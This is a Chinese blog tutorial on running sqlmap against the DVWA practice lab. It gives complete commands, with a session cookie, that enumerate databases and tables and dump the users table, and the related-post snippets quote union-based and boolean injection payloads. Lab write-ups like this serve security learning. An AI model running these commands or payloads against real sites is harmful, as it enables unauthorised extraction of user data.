利用sqlmap对dvwa进行sql注入

最新推荐文章于 2024-06-26 01:09:19 发布
最新推荐文章于 2024-06-26 01:09:19 发布
阅读量4.8k 收藏 23
点赞数 4
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47912094/article/details/119522742
版权

sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。采用五种独特的SQL注入技术,分别是:
1)基于布尔的盲注,即可以根据返回页面判断条件真假的注入。
2)基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。
3)基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。
4)联合查询注入,可以使用union的情况下的注入。
5)堆查询注入,可以同时执行多条语句的执行时的注入。

安装很简单:
由于SQLMap是利用Python语言写的,所以需要将Python这个语言环境给安装上,以下是详细安装过程:
准备工作:
(1) Python2.7.11,下载地址:https://www.python.org/downloads/
(2) SQLMap,下载地址:http://sqlmap.org/

进入本次sqlmap的渗透用法:
在这里插入图片描述
可以看出需要登录,加上cookie:
sqlmap.py -u “http://192.168.124.13/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low;PHPSESSID=k7bc386n0qiu56mjegpq2a4iu1” --batch

在这里插入图片描述
成功:可看到服务器配置信息,继续拿数据库信息;
在这里插入图片描述
sqlmap.py -u “http://192.168.124.13/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low;PHPSESSID=k7bc386n0qiu56mjegpq2a4iu1” --batch --dbs
在这里插入图片描述
查看指定数据库并展示所有表:
sqlmap.py -u “http://192.168.124.13/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low;PHPSESSID=k7bc386n0qiu56mjegpq2a4iu1” --batch -D dvwa --tables
在这里插入图片描述
查看指定数据库的指定表的所有列:
sqlmap.py -u “http://192.168.124.13/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low;PHPSESSID=k7bc386n0qiu56mjegpq2a4iu1” --batch -D dvwa -T users --columns
在这里插入图片描述
查询指定列数据:
sqlmap.py -u “http://192.168.124.13/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low;PHPSESSID=k7bc386n0qiu56mjegpq2a4iu1” --batch -D dvwa -T users -C user --dump
在这里插入图片描述
成功注出数据。

CoOlCoKeZ
关注
  • 4
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqlmap在windows上执行sql注入利用dvwa靶场.md
05-19
分享一下自己学习sqlmap的过程,因为网上的资源很少,所以就想着写个博客记录一下,同时也分享一下吧。就先讲到这里吧,有问题的可以私信。欢迎大家提意见。
1、渗透之利用sqlmapdvwa进行sql注入
tzyyy1的博客
02-28 7167
测试环境:dvwa+Kail 1、寻找注入点:http://192.168.43.75/dvwa/vulnerabilities/sqli/ 1.2、注入点初步测试: 1' union select user, password from users# 1.3、继续测试:1'or'1'='1 2、使用Kail工具测试: sqlmap -u http://192.168.43....
【渗透测试】|sqlmap工具注入-基于dvwa的sql injection
yangdan_jiayou的博客
03-27 651
这个检测结果表明系统对联合查询的处理方式存在漏洞,可以通过联合查询来获取额外的信息或执行其他操作。这个检测结果表明系统对错误消息的处理方式存在漏洞,可以通过错误消息来推断数据库的结构或内容,从而进行注入攻击。这个payload试图通过在查询中嵌入一个时间延迟函数来验证注入点的存在,如果系统在执行这个查询时发生了延迟,那么说明注入点存在,攻击者可以进一步利用这个注入点执行其他操作。这个payload尝试通过在查询中嵌入一个错误,然后通过错误消息中的内容来获取敏感信息或执行其他恶意操作。
sqlmap命令学习及测试dvwa_SQL_Injection】
最新发布
qq_58553228的博客
06-26 440
内容有常见的sqlmap的options,至于script暂未学习到。
Sqlmap
mumuzi2的博客
02-25 388
下载地址: http://sqlmap.org/ 需要环境: python 使用方法:
SQL注入DVWA靶场搭建及使用sqlMap注入sqlmap问题及解决办法)
tmzy1的博客
03-19 5932
SQL注入DVWA靶场搭建及使用sqlMap注入sqlmap问题及解决办法)
sqlmap快速上手教程
weixin_34138377的博客
10-31 308
为什么80%的码农都做不了架构师?>>> ...
DVWA靶场-SQL Injection(难度低、中、高)-sqlmap自动化漏洞扫描
weixin_43850721的博客
12-14 2787
此处使用docker容器搭建靶场。使用docker平台即可实现靶场的快速搭建,比较方便。使用docker搜索dvwa镜像:docker search dvwa。此处选择第一个镜像文件下载:docker pull citizenstig/dvwa。下载完毕后,可以使用docker images来查看所有的镜像,从中可以找到dvwa
DVWA-SQL注入【全难度】
ethan18的博客
06-10 292
我想表达的是,我们可以直接通过抓包,来改变我们想要的请求。这就是最初级的,毫无安全措施的版本,发现了注入点:因为我们发现我们输入的语句直接变成了在SQL语句中的报错,有两个相同的。如果这个注入点是数值型的话,那么当我输入1 and 1=2或者1 and 1=1的时候,在SQL语句中会自动变成。如果这个注入点是字符型的,那么当我输入1 and 1=2或者1 and 1=1的时候,在SQL语句中会自动变成。可以使用的方法挺多的,不过网上能够找到的基本都是使用Burpsuite来抓包,我们也可以这样。
使用sqlmap+burpsuite进行中级sql注入
06-01
在网络安全领域,SQL注入是一种常见的攻击手段,通过利用应用程序对用户输入数据的不恰当处理,攻击者可以操纵SQL查询,获取、修改、删除数据库中的敏感信息。本篇将细介绍如何结合sqlmap和BurpSuite工具进行中级...
学习之sql注入漏洞网址的创建
06-06
在IT安全领域,SQL注入是一种常见的攻击手段,它利用了应用程序对用户输入处理不当的漏洞。这篇文章的主题是“学习之sql注入漏洞网址的创建”,它旨在帮助初学者或研究人员建立一个自定义的环境来模拟SQL注入攻击,...
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全细笔记
06-30
SQL 注入攻击与防御 SQL 注入是一种常见的 Web 应用安全漏洞...为了防御 SQL 注入攻击,需要对用户输入进行严格的验证,使用 Prepared Statement 和参数化查询,定期备份数据库,并使用 SQL 注入检测工具来检测漏洞。
计算机病毒与防护:SQL注入漏洞的利用.ppt
06-10
本讲座将深入探讨如何利用SQL注入漏洞以及如何使用SQLmap这个强大的渗透测试工具进行测试和防御。 SQLmap是一个开源的自动化工具,专门用于检测和利用SQL注入漏洞。它配备了先进的探测引擎,能够识别多种类型的注入...
SQL 注入 DVWA 实验
m0_63645854的博客
04-10 2087
SQL注入与自动注入
DVWA练习记录--使用sqlmap实现SQL注入
weixin_63095349的博客
09-05 264
利用sqlmap注入
sqlmapdvwa进行sql注入
weixin_52971422的博客
04-01 4757
渗透环境:dvwa 攻击机:kali 注入点 测试 在kali使用sqlmap,添加cooki来注入 sqlmap -u "http://192.168.17.152/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=24d706127dc1260818eadf1641c43547" --dbs 成功 继续查询数据库的表 sqlmap -u "http://1
渗透测试实验_在kali Linux 2021环境下使用sqlmapDVWA进行sql注入
weixin_47133613的博客
04-06 7909
文章目录1. sqlmap是什么2. 启动kali Linux ,进行sqlmap更新3. 启动phpStudy,启动火狐浏览器代理,运行BurpSuite4. 如果sqlmap出现404或者返回test的报错,可以尝试重置DVWA,重启phpStudy5. 选择安全等级“Low”,点击“SQL Injection”,通过报文中的url和cookie构造sqlmap命令获取信息5.1 获取数据库5.2 获取dvwa数据库中的表名5.3 获取dvwa库中users表中的列名5.4 获取dvwa库中users表
SQLMap 注入 DVWA实战
Cobra的博客
12-16 2996
一、low级别 1、进入dvwa界面输入1,点击Submit,得到链接 http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit# 2、我们用sqlmap进行爆破 sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#" 我们可以看到需要跳转到login的页面,所以,认为这里.
DVWA--sql注入(工具注入)
firecjh的博客
06-09 558
(6)导出DBname数据库table表中指定列的数据。(5)列出DBname数据库table表中的所有列。(4)列出DBname数据库所有的表。的中级进行注入,写出实验步骤。(2)列出所有的数据库。(3)列出当前数据库。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值